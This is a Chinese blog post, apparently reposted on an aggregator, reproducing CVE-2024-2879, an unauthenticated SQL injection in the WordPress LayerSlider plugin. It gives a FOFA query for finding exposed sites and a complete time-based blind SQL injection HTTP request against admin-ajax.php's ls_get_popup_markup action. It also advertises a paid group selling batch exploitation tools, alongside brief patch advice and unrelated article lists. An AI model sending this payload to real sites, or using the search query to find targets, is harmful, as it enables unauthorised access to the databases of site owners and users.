WordPress LayerSlider插件SQL注入漏洞复现(CVE-2024-2879)

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

WordPress插件LayerSlider是一款可视化网页内容编辑器、图形设计软件和数字视觉效果应用程序,全球活跃安装量超过 1,000,000 次。

0x03 漏洞威胁

WordPress LayerSlider插件版本7.9.11 – 7.10.0中,由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过 ls_get_popup_markup 操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。

影响版本:

LayerSlider插件版本7.9.11 – 7.10.0

0x04 漏洞环境

FOFA:

body="/wp-content/plugins/LayerSlider/"

0x05 漏洞复现

POC

GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

延时5秒

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

目前漏洞已经修复,受影响用户可升级到以下版本:

LayerSlider插件版本 >= 7.10.1

下载链接:

https://layerslider.com/

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25

星球福利:每天更新最新漏洞POC、资料文献、内部工具等

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-13 00:28:03       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-13 00:28:03       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-13 00:28:03       87 阅读
  4. Python语言-面向对象

    2024-04-13 00:28:03       96 阅读

热门阅读

  1. pyqt 标题栏设置

    2024-04-13 00:28:03       35 阅读
  2. linux运维定时任务crontab命令

    2024-04-13 00:28:03       39 阅读
  3. https的网页会不会被伪造

    2024-04-13 00:28:03       37 阅读
  4. linux编辑技巧

    2024-04-13 00:28:03       34 阅读
  5. 电子秤的方案设计流程

    2024-04-13 00:28:03       34 阅读
  6. 基于docker-compose做版本升级

    2024-04-13 00:28:03       42 阅读
  7. js正则表达式详解与常用代码讲解

    2024-04-13 00:28:03       38 阅读
  8. 一篇文章厘清C#中的lambda表达式

    2024-04-13 00:28:03       34 阅读
  9. LeetCode刷题笔记第746题:使用最小花费爬楼梯

    2024-04-13 00:28:03       37 阅读